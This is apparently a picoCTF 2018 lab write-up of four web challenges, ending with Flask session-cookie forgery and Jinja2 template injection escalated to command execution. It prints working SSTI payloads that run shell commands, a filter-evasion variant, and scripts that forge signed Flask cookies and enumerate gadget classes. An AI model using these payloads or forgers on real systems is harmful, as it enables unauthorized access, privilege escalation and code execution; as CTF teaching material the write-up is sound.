picoCTF 2018 Replay, Part I

Routine catch-up on challenges I still owed a replay: some good problems from picoCTF 2018.

Artisinal Handcrafted HTTP 3

We found a hidden flag server hiding behind a proxy, but the proxy has some… interesting ideas of what qualifies someone to make HTTP requests. Looks like you’ll have to do this one by hand. Try connecting via nc 2018shell1.picoctf.com 58662, and use the proxy to send HTTP requests to flag.local. We’ve also recovered a username and a password for you to use on the login page: realbusinessuser/potoooooooo.

After passing the proxy's check you land in a shell where every HTTP request has to be typed by hand.

Follow the challenge's lead and start with the root page:

GET / HTTP/1.1
Host: flag.local

HTTP/1.1 200 OK
x-powered-by: Express
content-type: text/html; charset=utf-8
content-length: 321
etag: W/"141-LuTf9ny9p1l454tuA3Un+gDFLWo"
date: Mon, 15 Oct 2018 14:27:00 GMT
connection: close


<html>
<head>
<link rel="stylesheet" type="text/css" href="main.css" />
</head>
<body>
<header>
<h1>Real Business Internal Flag Server</h1>
<a href="/login">Login</a>
</header>
<main>
<p>You need to log in before you can see today's flag.</p>
</main>
</body>
</html>

Next, send a GET for /login:

GET /login HTTP/1.1
Host: flag.local

HTTP/1.1 200 OK
x-powered-by: Express
content-type: text/html; charset=utf-8
content-length: 498
etag: W/"1f2-UE5AGAqbLVQn1qrfKFRIqanxl9I"
date: Mon, 15 Oct 2018 14:28:51 GMT
connection: close


<html>
<head>
<link rel="stylesheet" type="text/css" href="main.css" />
</head>
<body>
<header>
<h1>Real Business Internal Flag Server</h1>
<a href="/login">Login</a>
</header>
<main>
<h2>Log In</h2>

<form method="POST" action="login">
<input type="text" name="user" placeholder="Username" />
<input type="password" name="pass" placeholder="Password" />
<input type="submit" />
</form>
</main>
</body>
</html>

Following the challenge hint, POST user=realbusinessuser&pass=potoooooooo to /login. The body is 38 bytes, so Content-Length must be exactly 38, and the blank line between the headers and the body is mandatory or the server will never see the body:

POST /login HTTP/1.1
Host: flag.local
Content-Type: application/x-www-form-urlencoded
Content-Length: 38

user=realbusinessuser&pass=potoooooooo

HTTP/1.1 302 Found
x-powered-by: Express
set-cookie: real_business_token=PHNjcmlwdD5hbGVydCgid2F0Iik8L3NjcmlwdD4%3D; Path=/
location: /
vary: Accept
content-type: text/plain; charset=utf-8
content-length: 23
date: Mon, 15 Oct 2018 14:31:17 GMT
connection: close

The response is a 302 redirect that also sets a cookie. Follow the Location target and attach the cookie:

GET / HTTP/1.1
Host: flag.local
Cookie: real_business_token=PHNjcmlwdD5hbGVydCgid2F0Iik8L3NjcmlwdD4%3D

HTTP/1.1 200 OK
x-powered-by: Express
content-type: text/html; charset=utf-8
content-length: 438
etag: W/"1b6-P3X+Gp97q63F5nCePqT+lsVPEas"
date: Mon, 15 Oct 2018 14:38:42 GMT
connection: close


<html>
<head>
<link rel="stylesheet" type="text/css" href="main.css" />
</head>
<body>
<header>
<h1>Real Business Internal Flag Server</h1>
<div class="user">Real Business Employee</div>
<a href="/logout">Logout</a>
</header>
<main>
<p>Hello <b>Real Business Employee</b>! Today's flag is: <code>picoCTF{0nLY_Us3_n0N_GmO_xF3r_pR0tOcol5_a87a}</code>.</p>
</main>
</body>
</html>
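The whole exchange above is three requests typed by hand, and the parts that usually go wrong when doing this are the CRLF line endings, the empty line that ends the header block, and a Content-Length that does not match the body. The following is an added example, not code from the original writeup: a small request builder and response parser that computes Content-Length from the encoded body, pulls the name=value pair out of Set-Cookie, and turns a 302 into the follow-up GET. The sample 302 response is constructed from the one shown above (the 23-byte body is Express's standard "Found. Redirecting to /" text, which the writeup omitted). It also decodes real_business_token: once URL-decoded and base64-decoded it is just the literal string <script>alert("wat")</script>, a fixed value rather than a signed session, which is why replaying it is enough.

```python
import base64
from urllib.parse import unquote

CRLF = "\r\n"


def build_request(method, path, host, headers=None, body=""):
    """Build a raw HTTP/1.1 request exactly as you would type it at the proxy:
    request line, Host, extra headers, an empty line, then the body.
    Content-Length is derived from the encoded body so it cannot be off by one."""
    lines = [f"{method} {path} HTTP/1.1", f"Host: {host}"]
    for name, value in (headers or {}).items():
        lines.append(f"{name}: {value}")
    data = body.encode()
    if data:
        lines.append(f"Content-Length: {len(data)}")
    # The empty line terminating the header block is required even when there is no body.
    return (CRLF.join(lines) + CRLF + CRLF).encode() + data


def parse_response(raw):
    """Split a raw response into (status_code, headers, body).
    Header names are lower-cased; repeated headers such as Set-Cookie become a list.
    Both CRLF and bare LF (as in a terminal paste) are accepted."""
    text = raw.decode("utf-8", "replace").replace("\r\n", "\n")
    head, _, body = text.partition("\n\n")
    status_line, *header_lines = head.split("\n")
    status = int(status_line.split(" ", 2)[1])
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return status, headers, body


def cookie_from_set_cookie(headers):
    """Keep only name=value from each Set-Cookie; attributes like Path are not sent back."""
    pairs = [v.split(";", 1)[0].strip() for v in headers.get("set-cookie", [])]
    return "; ".join(pairs)


def next_request_after_redirect(status, headers, host):
    """For a redirect, build the GET for the Location target carrying any cookie just issued."""
    if status not in (301, 302, 303, 307, 308) or "location" not in headers:
        return None
    extra = {}
    cookie = cookie_from_set_cookie(headers)
    if cookie:
        extra["Cookie"] = cookie
    return build_request("GET", headers["location"][0], host, extra)


def decode_token(cookie_value):
    """real_business_token is URL-encoded base64; decode it to see what was actually issued."""
    return base64.b64decode(unquote(cookie_value))


# Constructed sample: the 302 from the writeup, with Express's default redirect body.
SAMPLE_302 = (
    b"HTTP/1.1 302 Found\r\n"
    b"x-powered-by: Express\r\n"
    b"set-cookie: real_business_token=PHNjcmlwdD5hbGVydCgid2F0Iik8L3NjcmlwdD4%3D; Path=/\r\n"
    b"location: /\r\n"
    b"vary: Accept\r\n"
    b"content-type: text/plain; charset=utf-8\r\n"
    b"content-length: 23\r\n"
    b"date: Mon, 15 Oct 2018 14:31:17 GMT\r\n"
    b"connection: close\r\n"
    b"\r\n"
    b"Found. Redirecting to /"
)

if __name__ == "__main__":
    login = build_request("POST", "/login", "flag.local",
                          {"Content-Type": "application/x-www-form-urlencoded"},
                          "user=realbusinessuser&pass=potoooooooo")
    print(login.decode())
    status, headers, body = parse_response(SAMPLE_302)
    print(next_request_after_redirect(status, headers, "flag.local").decode())
    print(decode_token(cookie_from_set_cookie(headers).split("=", 1)[1]))
```

The builder is what you would paste into the nc session; the parser is there so the same code can drive a socket if you get tired of typing.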

Flaskcards

We found this fishy website for flashcards that we think may be sending secrets. Could you take a look?

The home page offers two functions, register and log in; nothing abnormal there. Register a random account and log in.

Once logged in there are three functions: create a card, list the cards, and a page that only shows "you're not admin".

This challenge is Flask server-side template injection (SSTI).

Reference: Server-side template injection

Submitting a template expression as card content came back evaluated (the page rendered 4 instead of the expression), confirming the injection.

Dumping the Flask config object through the template exposes the SECRET_KEY, which carries the flag:

picoCTF{secret_keys_to_the_kingdom_584f8327}

Flaskcards Skeleton Key

Nice! You found out they were sending the Secret_key: 385c16dd09098b011d0086f9e218a0a2. Now, can you find a way to log in as admin?

Reference: how cookie work in Flask application

This challenge combines Flask cookie forgery with the template injection from the previous one.

Flask cookie encode/decode script

Reading up on it: Flask does not encrypt the session cookie, it signs it with the secret_key (itsdangerous URLSafeTimedSerializer). The payload is URL-safe base64 of JSON, optionally zlib-compressed, and anyone can read it without the key; the key is only needed to produce a valid signature. With the leaked key we can therefore write whatever we like into the session.

Decode the cookie, set user_id to 1, re-encode it with the key and put it in the Cookie header to get the flag (this turns the ordinary account into admin):

from flask.sessions import SecureCookieSessionInterface
from itsdangerous import URLSafeTimedSerializer


class SimpleSecureCookieSessionInterface(SecureCookieSessionInterface):
    # Override: take the secret_key directly instead of a Flask app instance,
    # but reuse Flask's own salt, serializer, key derivation and digest so the
    # output is exactly what the target application would produce.
    def get_signing_serializer(self, secret_key):
        if not secret_key:
            return None
        signer_kwargs = dict(
            key_derivation=self.key_derivation,
            digest_method=self.digest_method
        )
        return URLSafeTimedSerializer(secret_key, salt=self.salt,
                                      serializer=self.serializer,
                                      signer_kwargs=signer_kwargs)


def decodeFlaskCookie(secret_key, cookieValue):
    # loads() verifies the signature; a wrong key raises itsdangerous.BadSignature
    sscsi = SimpleSecureCookieSessionInterface()
    signingSerializer = sscsi.get_signing_serializer(secret_key)
    return signingSerializer.loads(cookieValue)


def encodeFlaskCookie(secret_key, cookieDict):
    # dumps() re-signs the dict with a fresh timestamp
    sscsi = SimpleSecureCookieSessionInterface()
    signingSerializer = sscsi.get_signing_serializer(secret_key)
    return signingSerializer.dumps(cookieDict)


cookie = decodeFlaskCookie('385c16dd09098b011d0086f9e218a0a2',
                           '.eJwljzFqBDEMAP_i-gpJtmTpPrNYskRCIIHduyrk77mQbpqBme921JnXW7s_zmfe2vG-273VZhNnJ7AoXSHLWVERs6rPsvDYzBNrRI1U8RfBAFrTOu1U2kBDqChsdTADpzE7Ti6sTOhUwloQMkgn6-xZJpFJiFvAe7u1uM46Hl8f-fnqEbRUW2NQJCiVy1A3IzXckTbDgpLpz3teef5PWPv5BaAZPmI.DpSgrw.SGhImnmWlX33-8gs-0L8kJWC3IY')

# session keys are plain str; user_id 1 is the first account, i.e. admin
cookie['user_id'] = '1'

print(encodeFlaskCookie('385c16dd09098b011d0086f9e218a0a2', cookie))
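The script above leans on Flask and itsdangerous, which hides the point that matters for the attack: the cookie is readable without the key and only the last segment depends on it. As an added example (not part of the original writeup, and not Flask's code), here is the same cookie format built from the standard library only: the payload is compact JSON, zlib-compressed when that is shorter, URL-safe base64 with a leading "." marking compression; the middle segment is a big-endian timestamp; the signature is HMAC-SHA1 over payload.timestamp, keyed with HMAC-SHA1(secret_key, "cookie-session"). The timestamp epoch is the Unix epoch in itsdangerous 2.x, while the 1.x releases current in 2018 counted from 2011-01-01; the "DpSgrw" segment of the cookie above decodes to 244621487, which under that older epoch lands in early October 2018, during the competition. This simplified version assumes a session that is plain JSON (Flask's tagged serializer wraps other types such as bytes or datetime), and the sample sessions are constructed here; use flask-unsign or itsdangerous itself for anything beyond a demonstration.

```python
import base64
import hashlib
import hmac
import json
import time
import zlib

SALT = b"cookie-session"  # Flask's fixed salt for the session cookie


def b64e(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=")


def b64d(data):
    data = data.encode() if isinstance(data, str) else data
    return base64.urlsafe_b64decode(data + b"=" * (-len(data) % 4))


def decode_payload(cookie):
    """Read the session contents. No key is needed: a leading '.' means zlib,
    the first segment is URL-safe base64 of compact JSON."""
    compressed = cookie.startswith(".")
    payload = (cookie[1:] if compressed else cookie).split(".")[0]
    raw = b64d(payload)
    if compressed:
        raw = zlib.decompress(raw)
    return json.loads(raw)


def session_timestamp(cookie):
    """Middle segment: big-endian integer, seconds since the serializer's epoch."""
    ts = cookie.rpartition(".")[0].rpartition(".")[2]
    return int.from_bytes(b64d(ts), "big")


def derive_key(secret_key):
    """itsdangerous 'hmac' key derivation, as configured by Flask."""
    return hmac.new(secret_key.encode(), SALT, hashlib.sha1).digest()


def signature(secret_key, signed_value):
    return b64e(hmac.new(derive_key(secret_key), signed_value, hashlib.sha1).digest())


def sign_session(data, secret_key, timestamp=None):
    """Produce a Flask-style cookie: payload.timestamp.signature."""
    body = json.dumps(data, separators=(",", ":"), sort_keys=True).encode()
    compressed = zlib.compress(body)
    if len(compressed) < len(body) - 1:  # same threshold as itsdangerous
        payload = b"." + b64e(compressed)
    else:
        payload = b64e(body)
    ts = int(time.time()) if timestamp is None else timestamp
    ts_bytes = ts.to_bytes((ts.bit_length() + 7) // 8 or 1, "big")
    signed_value = payload + b"." + b64e(ts_bytes)
    return (signed_value + b"." + signature(secret_key, signed_value)).decode()


def verify_session(cookie, secret_key):
    """Return the session dict if the signature matches secret_key, else None."""
    signed_value, _, sig = cookie.rpartition(".")
    expected = signature(secret_key, signed_value.encode())
    if not sig or not hmac.compare_digest(expected, sig.encode()):
        return None
    return decode_payload(cookie)


def forge_session(cookie, secret_key, **changes):
    """Read an existing session (no key needed), change fields, re-sign with the leaked key."""
    data = decode_payload(cookie)
    data.update(changes)
    return sign_session(data, secret_key)


if __name__ == "__main__":
    key = "385c16dd09098b011d0086f9e218a0a2"
    page_cookie = (".eJwljzFqBDEMAP_i-gpJtmTpPrNYskRCIIHduyrk77mQbpqBme921JnXW7s_zmfe2vG-273VZhNn"
                   "J7AoXSHLWVERs6rPsvDYzBNrRI1U8RfBAFrTOu1U2kBDqChsdTADpzE7Ti6sTOhUwloQMkgn6-xZ"
                   "JpFJiFvAe7u1uM46Hl8f-fnqEbRUW2NQJCiVy1A3IzXckTbDgpLpz3teef5PWPv5BaAZPmI"
                   ".DpSgrw.SGhImnmWlX33-8gs-0L8kJWC3IY")
    print("timestamp:", session_timestamp(page_cookie))
    print("verified:", verify_session(page_cookie, key))
    print("forged:", forge_session(page_cookie, key, user_id="1"))
```

Because verification only checks the signature, the forged cookie is accepted for as long as the application keeps the same key; rotating SECRET_KEY is the only way to invalidate cookies minted with a leaked one.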

picoCTF{1_id_to_rule_them_all_d77c1ed6}

References: wp1 wp2

Flaskcards and Freedom

There seem to be a few more files stored on the flash card server but we can’t login. Can you?
Hint:
・There’s more to the original vulnerability than meets the eye.
・Can you leverage the injection technique to get remote code execution?
・Sorry, but the database still reverts every 2 hours.

Template injection again, this time pushed all the way to remote code execution by walking from a template literal through Python's object model (commonly called a sandbox escape, although Flask's default Jinja environment is not sandboxed) until a reference to __builtins__ is reached:

{{[].__class__.__base__.__subclasses__()}}

The echoed list contains warnings.catch_warnings; its __init__ is a Python function, so __init__.__globals__ is the warnings module namespace, which carries __builtins__ and therefore eval and __import__.

References: Flask Jinja2 template injection ideas summary; Flask & Jinja2 SSTI

Command-execution payloads. The subclass index (243 in the first form, 197 in the second) depends on the target's Python version and on which modules it has imported, so enumerate __subclasses__() on the target rather than copying a number. The second form reads the attribute names from query parameters through the attr filter, so the template body itself contains none of the dunder names:

Payload 1:
{{[].__class__.__base__.__subclasses__()[243].__init__.__globals__['__builtins__'].eval('__import__("os").popen("ls").read()')}}
{{[].__class__.__base__.__subclasses__()[243].__init__.__globals__['__builtins__'].eval('__import__("os").popen("cat flag").read()')}}

Payload 2:
{{((''|attr(request.args.param)|attr(request.args.param2))[1]|attr(request.args.param3))()[197](request.args.param4).open().read()}}

picoCTF{R_C_E_wont_let_me_be_76de9280}
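The two payloads use different indices (243 and 197) for the same reason that copying one from a writeup usually fails: object.__subclasses__() is ordered by class creation, which varies with the interpreter version and whatever the application imported. The following is an added example, not code from the writeup: it reproduces, in plain Python, the enumeration you would do through the first Flaskcards injection ({{[].__class__.__base__.__subclasses__()}}), locates warnings.catch_warnings by name, lists every class whose __init__.__globals__ exposes __builtins__, checks the gadget actually yields eval, and fills the index into payload 1. One Jinja detail is handled explicitly: Jinja's attribute lookup falls back to item lookup, so .__globals__['__builtins__'].eval works whether __builtins__ is the builtins module or its dict; plain Python has to branch on that. Run it on the target's Python (same version, same imports) to get indices that are valid there.

```python
import warnings  # guarantees warnings.catch_warnings is among object's subclasses


def list_subclasses():
    """What {{[].__class__.__base__.__subclasses__()}} returns: every class loaded so far,
    in creation order, which differs between interpreters and import sets."""
    return object.__subclasses__()


def find_gadget_index(name):
    """Index of the first subclass called `name`, or None. Compute this on the target."""
    for index, cls in enumerate(list_subclasses()):
        if cls.__name__ == name:
            return index
    return None


def gadget_builtins(cls):
    """__builtins__ reachable through cls.__init__.__globals__, or None.
    C-implemented __init__ slots have no __globals__, so most builtin types are useless here."""
    try:
        globs = getattr(cls.__init__, "__globals__", None)
    except Exception:
        return None
    if not globs or "__builtins__" not in globs:
        return None
    return globs["__builtins__"]


def find_all_gadgets():
    """Every (index, qualified name) that offers a path to __builtins__, i.e. to eval/__import__."""
    found = []
    for index, cls in enumerate(list_subclasses()):
        if gadget_builtins(cls) is not None:
            found.append((index, f"{cls.__module__}.{cls.__qualname__}"))
    return found


def run_via_gadget(index, expression):
    """Do in Python what payload 1 does in Jinja: reach eval through the gadget and call it.
    __builtins__ is a module in __main__ but a dict in imported modules; handle both."""
    builtins_obj = gadget_builtins(list_subclasses()[index])
    if builtins_obj is None:
        raise ValueError(f"subclass {index} does not expose __builtins__")
    evaluate = builtins_obj["eval"] if isinstance(builtins_obj, dict) else builtins_obj.eval
    return evaluate(expression)


def build_payload(index, command):
    """Payload 1 from the writeup with the enumerated index filled in."""
    return ("{{[].__class__.__base__.__subclasses__()[%d].__init__.__globals__"
            "['__builtins__'].eval('__import__(\"os\").popen(\"%s\").read()')}}"
            % (index, command))


if __name__ == "__main__":
    idx = find_gadget_index("catch_warnings")
    print("catch_warnings is at index", idx, "in this interpreter")
    print("usable gadgets:", len(find_all_gadgets()))
    print(build_payload(idx, "ls"))
```

On a real target you cannot run this locally, but the same enumeration works through the injection itself: render the subclass list, find catch_warnings (or any other entry in the gadget list) by name, and only then hardcode the index in the payload.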

References


Server-side template injection

how cookie work in Flask application

Flask cookie encode/decode script

wp1 wp2

Flask Jinja2 template injection ideas summary; Flask & Jinja2 SSTI

More replays to come.

------------- End of post, thanks for reading -------------